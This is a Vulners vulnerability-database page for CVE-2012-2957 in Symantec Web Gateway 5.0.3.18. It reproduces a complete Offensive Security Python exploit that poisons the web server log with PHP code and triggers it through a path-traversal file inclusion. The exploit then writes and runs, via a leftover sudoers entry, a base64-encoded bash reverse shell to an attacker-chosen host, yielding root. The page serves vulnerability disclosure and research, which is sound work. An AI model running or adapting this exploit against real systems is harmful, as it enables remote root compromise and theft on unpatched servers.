Vulners
Lucene search
Symantec Web Gateway 5.0.3.18 LFI / Command Execution
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2012-2957 | 24 Jul 201200:00 | – | circl |
 | Symantec Web Gateway Local File Inclusion (CVE-2012-2957) | 29 Sep 202100:00 | – | checkpoint_advisories |
 | CVE-2012-2957 | 23 Jul 201217:00 | – | cve |
 | CVE-2012-2957 | 23 Jul 201217:00 | – | cvelist |
 | Symantec Web Gateway 5.0.3 RCE | 8 Feb 201300:00 | – | dsquare |
 | EUVD-2012-2935 | 7 Oct 202500:30 | – | euvd |
 | CVE-2012-2957 | 23 Jul 201217:55 | – | nvd |
 | Symantec Web Gateway Local File Manipulation Authentication Bypass Vulnerability | 24 Jul 201200:00 | – | openvas |
| Symantec Web Gateway Multiple Vulnerabilities | 24 Jul 201200:00 | – | openvas |
 | Design/Logic Flaw | 23 Jul 201217:55 | – | prion |
10
`#!/usr/bin/python
'''
The original patch for the Symantec Web Gateway 5.0.2 LFI vulnerability removed the
/tmp/networkScript file but left the entry in /etc/sudoers, allowing us to simply
recreate the file and obtain a root shell using a different LFI vulnerability.
Timeline:
# 06 Jun 2012: Vulnerability reported to CERT
# 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
'''
import socket
import sys
import base64
print "[*] #########################################################"
print "[*] Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit"
print "[*] Offensive Security - http://www.offensive-security.com"
print "[*] #########################################################\n"
if (len(sys.argv) != 4):
print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>"
exit(0)
rhost = str(sys.argv[1])
lhost = sys.argv[2]
lport = sys.argv[3]
# Base64 encoded bash reverse shell
# Payload does sudo-fu abuse of sudoable /tmp/networkScript with apache:apache permissions
payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/'''+lhost+'/' + lport
payload+=''' 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")
taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded
trigger="GET /spywall/languageTest.php?&language=../../../../../../../../usr/local/apache2/logs/access_log%00 HTTP/1.0\r\n\r\n"
print "[*] Super Sudo Backdoor injection, w00t"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((rhost, 80))
expl.send(taint)
expl.close()
print "[*] Triggering Payload ...3,2,1 "
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((rhost, 80))
expl.send(trigger)
expl.close()
print "[*] Can you haz shell on %s %s ?\n" % (lhost,lport)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2012 00:00Current
EPSS0.06861